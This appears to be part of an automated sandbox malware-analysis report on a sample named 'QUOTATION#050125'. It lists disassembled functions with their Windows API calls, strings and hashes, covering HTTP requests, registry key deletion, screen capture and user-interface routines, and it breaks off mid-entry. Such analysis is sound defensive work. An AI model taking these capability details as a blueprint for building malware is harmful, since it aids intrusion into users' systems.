GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,004C23B3,000000FF), ref: 004A0127
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,004C23B3,000000FF), ref: 004A0138
GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 004A014E
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 004A015C
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 004A016A
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,004C23B3,000000FF), ref: 004A01B5
DeleteCriticalSection.KERNEL32(0055070C,00000007,?,?,?,?,004C23B3,000000FF), ref: 004A01E1
CloseHandle.KERNEL32(00000000,?,?,?,?,004C23B3,000000FF), ref: 004A01F1

Strings

SleepConditionVariableCS, xrefs: 004A0154
kernel32.dll, xrefs: 004A0133
WakeAllConditionVariable, xrefs: 004A0162
api-ms-win-core-synch-l1-2-0.dll, xrefs: 004A0122
InitializeConditionVariable, xrefs: 004A0148

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: AddressHandleProc$CriticalModuleSection$CloseCountCreateDeleteEventInitializeSpin
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 3758863719-1714406822
Opcode ID: a4796544a25b55c20d6b3150b1999f9e3c318bd8d9098afccba419a45adb3993
Instruction ID: ff8f9d5e811c755a9ab89c4ad83d9eb1d654b7d912d031ed8362deda6869db28
Opcode Fuzzy Hash: a4796544a25b55c20d6b3150b1999f9e3c318bd8d9098afccba419a45adb3993
Instruction Fuzzy Hash: 65218371A84711ABEB105BA5AC59FEA3FE8FB69B51F00412AFC01D2390DB7A9804DB54

Function 0051091E Relevance: 23.1, APIs: 2, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 005109C6
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00510A54

Part of subcall function 004E2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004E2BFA

Strings

GETSELECTED, xrefs: 00510C4E
COLLAPSE, xrefs: 00510B01, 00510B1C
CHECK, xrefs: 00510A85, 00510AA0
ISCHECKED, xrefs: 00510CE1
EXISTS, xrefs: 00510B7C, 00510B97
GETITEMCOUNT, xrefs: 00510C1E
SELECT, xrefs: 00510D11
EXPAND, xrefs: 00510BF8
GETTOTALCOUNT, xrefs: 005109F2, 00510A17
GETTEXT, xrefs: 00510C97
UNCHECK, xrefs: 00510D3E

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3391685005-4258414348
Opcode ID: 49f8a24f8cd62c1238cb4e99f2f1a00bfb626931973dd601124bfcd81cad392c
Instruction ID: 9ed9861db447ea9351634cec0c07efb5f72226c87564bcb8cc348907efd13d5a
Opcode Fuzzy Hash: 49f8a24f8cd62c1238cb4e99f2f1a00bfb626931973dd601124bfcd81cad392c
Instruction Fuzzy Hash: 4EE1AA312083019FDB14EF25C4509AEBBE1BF98318F14895EF8969B3A2D774ED85CB91

Function 0048326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00551990), ref: 004C2F8D
GetMenuItemCount.USER32(00551990), ref: 004C303D
GetCursorPos.USER32(?), ref: 004C3081
SetForegroundWindow.USER32(00000000), ref: 004C308A
TrackPopupMenuEx.USER32(00551990,00000000,?,00000000,00000000,00000000), ref: 004C309D
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 004C30A9

Strings

0, xrefs: 0048327D

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: 8eec75a81a22e461dadc1213d6cf15b051abf3d18df8100bd80f874630332944
Instruction ID: 143ba005b0457363cc7970960c9ca05a180cad3ee9e24ad2c674864f6996d1fc
Opcode Fuzzy Hash: 8eec75a81a22e461dadc1213d6cf15b051abf3d18df8100bd80f874630332944
Instruction Fuzzy Hash: 1A712735640205BAEB219F29CD49FABBF64FF01724F20421BF5146A2E0C7F5A914DB99

Function 004F3E79 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 205COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 004F3EF8
GetDriveTypeW.KERNEL32(?), ref: 004F3FD6
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004F401E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004F4059
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004F4087

Strings

type cdaudio alias cd wait, xrefs: 004F4001
open, xrefs: 004F3F54, 004F3F59
wait, xrefs: 004F4044
close, xrefs: 004F3EFE, 004F3F18
open , xrefs: 004F3FE5
closed, xrefs: 004F3F08, 004F3F2D, 004F3F46, 004F3F7E, 004F3F97
close cd wait, xrefs: 004F4072
set cd door , xrefs: 004F4028

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1600147383-4113822522
Opcode ID: aa72f6ab43774d6a5e1a1c36807018bd4570e4e21ab2a9936540b0148c64e797
Instruction ID: 460d802d11f9527d99c031247f6d9f9e16fd04074e5d2ec0580d472903e834de
Opcode Fuzzy Hash: aa72f6ab43774d6a5e1a1c36807018bd4570e4e21ab2a9936540b0148c64e797
Instruction Fuzzy Hash: CE71BD316042069FC310EF24C8809BFBBE4EF95758F00492EFA9597251EB39EE45CB56

Function 0051833C Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 005183F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00515BF2), ref: 0051844E
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00518487
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 005184CA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00518501
FreeLibrary.KERNEL32(?), ref: 0051850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0051851D
DestroyIcon.USER32(?,?,?,?,?,00515BF2), ref: 0051852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00518549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00518555

Strings

.icl, xrefs: 00518368
.exe, xrefs: 00518388
.dll, xrefs: 005183AB

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 1446636887-1154884017
Opcode ID: 3d8e2419eb9f8a8f85c7deaf0ef7a29cd61ee83e0790465ae5c90e2efe028e6b
Instruction ID: 38d0ce7f44a55237e957feed2eb28141ff07c1e109963fb7351dedcaed07f00f
Opcode Fuzzy Hash: 3d8e2419eb9f8a8f85c7deaf0ef7a29cd61ee83e0790465ae5c90e2efe028e6b
Instruction Fuzzy Hash: 2E61D071540205BAEB24DF64CC41BFE7BACFB58715F10460AF815D61D1DFB4A990D7A0

Function 00516CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00516DEB
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00516E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00516E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00516E94
DestroyWindow.USER32(?), ref: 00516EB5
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00480000,00000000), ref: 00516EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00516EFD
GetDesktopWindow.USER32 ref: 00516F16
GetWindowRect.USER32(00000000), ref: 00516F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00516F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00516F4D

Part of subcall function 00499944: GetWindowLongW.USER32(?,000000EB), ref: 00499952

Strings

0, xrefs: 00516D98
tooltips_class32, xrefs: 00516E58, 00516EDD

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect
String ID: 0$tooltips_class32
API String ID: 1652260434-3619404913
Opcode ID: 185dbc2c31139103618cfd6971f379d7262827470b98508ac852b5f6b1c149ae
Instruction ID: 5a88e0e8bd0f92f19a2262475dccd15603129f578e9e802dd6b8edc8e7561379
Opcode Fuzzy Hash: 185dbc2c31139103618cfd6971f379d7262827470b98508ac852b5f6b1c149ae
Instruction Fuzzy Hash: 3D717874244344AFEB21CF18D894BABBFF9FB98304F04491EF99987260C771A94ADB15

Function 004FC476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004FC4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 004FC4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 004FC4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004FC4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 004FC533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 004FC549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004FC554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 004FC584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 004FC5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 004FC5F0
InternetCloseHandle.WININET(00000000), ref: 004FC5FB

Strings

, xrefs: 004FC575

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 2ac7375ff6c99eaa699ce4b56c49b29eede60df982b6ed6e21c7e4f3e675cf19
Instruction ID: 746fefb315dcb986fb99f2e3057f9ef1a30ce73f978e51e9ca6fe6d9c8f6197f
Opcode Fuzzy Hash: 2ac7375ff6c99eaa699ce4b56c49b29eede60df982b6ed6e21c7e4f3e675cf19
Instruction Fuzzy Hash: 1A516EB154020CBFDB218F61CA88ABB7BBCFF14354F00841EFA4596250DB79E908EB64

Function 0051856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00518592
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 005185A2
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 005185AD
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 005185BA
GlobalLock.KERNEL32(00000000), ref: 005185C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 005185D7
GlobalUnlock.KERNEL32(00000000), ref: 005185E0
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 005185E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 005185F8
OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,0051FC38,?), ref: 00518611
GlobalFree.KERNEL32(00000000), ref: 00518621
GetObjectW.GDI32(?,00000018,?), ref: 00518641
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00518671
DeleteObject.GDI32(?), ref: 00518699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 005186AF

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 25d841ae0417e85966270e790d5b05191877ef99d7bbd3d8f8c868f0d8360aa6
Instruction ID: 2e13beba34ee450dd3d45a751a340e92a219c56541fccd457a6f91ca18dcc236
Opcode Fuzzy Hash: 25d841ae0417e85966270e790d5b05191877ef99d7bbd3d8f8c868f0d8360aa6
Instruction Fuzzy Hash: 38413975640204BFDB218FA5CC88EEA7FB9FF9A711F108458F915E7260DB319945DB20

Function 004F14BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 004F1502
VariantCopy.OLEAUT32(?,?), ref: 004F150B
VariantClear.OLEAUT32(?), ref: 004F1517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 004F15FB
VarR8FromDec.OLEAUT32(?,?), ref: 004F1657
VariantInit.OLEAUT32(?), ref: 004F1708
SysFreeString.OLEAUT32(?), ref: 004F178C
VariantClear.OLEAUT32(?), ref: 004F17D8
VariantClear.OLEAUT32(?), ref: 004F17E7
VariantInit.OLEAUT32(00000000), ref: 004F1823

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 004F1625
Default, xrefs: 004F16AF

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: 06b0642615df19759510133d5b1b0bf13e2e756a880a74e786c9c5e67a4dddf2
Instruction ID: 91815bc841b51102c71e05edf0a9aca9d3d46e0b4fd4938709ad3e8be8f6434d
Opcode Fuzzy Hash: 06b0642615df19759510133d5b1b0bf13e2e756a880a74e786c9c5e67a4dddf2
Instruction Fuzzy Hash: B8D13631A00108EBDF04AF66D484B7DBBB1BF44704F14845BF606AB2A0DB38DC45DB9A

Function 0050B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0050C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0050B6AE,?,?), ref: 0050C9B5

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0050B6F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0050B772
RegDeleteValueW.ADVAPI32(?,?), ref: 0050B80A
RegCloseKey.ADVAPI32(?), ref: 0050B87E
RegCloseKey.ADVAPI32(?), ref: 0050B89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 0050B8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0050B904
RegDeleteKeyW.ADVAPI32(?,?), ref: 0050B922
FreeLibrary.KERNEL32(00000000), ref: 0050B983
RegCloseKey.ADVAPI32(00000000), ref: 0050B994

Strings

advapi32.dll, xrefs: 0050B8ED
RegDeleteKeyExW, xrefs: 0050B8FE

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 1742008743-4033151799
Opcode ID: ecf0ed53b7789a41a70eb6c1861efde2653f69bd2776943ee5c0d6f90d7ec799
Instruction ID: 3112d18a882f41215c5f87b91e66987a58425a9247432b91a9067a7bfac7f405
Opcode Fuzzy Hash: ecf0ed53b7789a41a70eb6c1861efde2653f69bd2776943ee5c0d6f90d7ec799
Instruction Fuzzy Hash: C3C14A30208201AFE714EF15C495F2EBBE5FF84318F18895DE59A4B2A2CB75ED45CB91

Function 0050255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 005025D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 005025E8
CreateCompatibleDC.GDI32(?), ref: 005025F4
SelectObject.GDI32(00000000,?), ref: 00502601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0050266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 005026AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 005026D0
SelectObject.GDI32(?,?), ref: 005026D8
DeleteObject.GDI32(?), ref: 005026E1
DeleteDC.GDI32(?), ref: 005026E8
ReleaseDC.USER32(00000000,?), ref: 005026F3

Strings

(, xrefs: 0050268D

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 49f41f64a24a66ca7a81388ffe127d991a1e4a33dbd338fc5b11a69c2db53872
Instruction ID: 8012861e1670f9dfe42c4f1f6fb9e4e184dcc26d3e7278d615a54265e77b9a46
Opcode Fuzzy Hash: 49f41f64a24a66ca7a81388ffe127d991a1e4a33dbd338fc5b11a69c2db53872
Instruction Fuzzy Hash: AE61F275D40219EFCF04CFA8D888EAEBBB6FF48310F20852AE956A7250D775A941DF50

Function 0050C998 Relevance: 19.5, APIs: 1, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0050B6AE,?,?), ref: 0050C9B5

Strings

HKEY_CLASSES_ROOT, xrefs: 0050CAF3, 0050CAF8
HKCR, xrefs: 0050CB29, 0050CB2E
HKEY_USERS, xrefs: 0050CBDF
HKEY_CURRENT_USER, xrefs: 0050CBBD
HKCU, xrefs: 0050CBCE
HKEY_CURRENT_CONFIG, xrefs: 0050CB79, 0050CB7E
HKLM, xrefs: 0050CA98, 0050CA9D
HKCC, xrefs: 0050CBAC
HKU, xrefs: 0050CBF0
HKEY_LOCAL_MACHINE, xrefs: 0050CA62, 0050CA67

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: ea584df3a5548b0f5480ebe905ed0ab8c75e9586fd47752efb112c6a17b4e0d4
Instruction ID: c1acccae00345752f2b8148f80d08236b63671ac206ccbd1ca2c096b09b01a65
Opcode Fuzzy Hash: ea584df3a5548b0f5480ebe905ed0ab8c75e9586fd47752efb112c6a17b4e0d4
Instruction Fuzzy Hash: 3F71023260012A8BCB20DF7CC9515BF3F95BBA7758B650B29FC669B2C4E634CD4483A0

Function 00518D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00499BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00499BB2

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00518D5A
GetFocus.USER32 ref: 00518D6A
GetDlgCtrlID.USER32(00000000), ref: 00518D75
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00518E1D
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00518ECF
GetMenuItemCount.USER32(?), ref: 00518EEC
GetMenuItemID.USER32(?,00000000), ref: 00518EFC
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00518F2E
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00518F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00518FA1

Strings

0, xrefs: 00518E9F

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: ee9bb73f40c9a11ae3aa4199dd033c24fd1a8ca9cc1e93c2b4d3869ed210d900
Instruction ID: a14e4ef411a031b79b407e8321be516a473e242da1071eddf604d41a46a73ff8
Opcode Fuzzy Hash: ee9bb73f40c9a11ae3aa4199dd033c24fd1a8ca9cc1e93c2b4d3869ed210d900
Instruction Fuzzy Hash: 8C819C715043019BEB20CF24D884AFB7FEAFB98314F140A1DF98597291DB71D985DB61

Function 004EBF30 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON

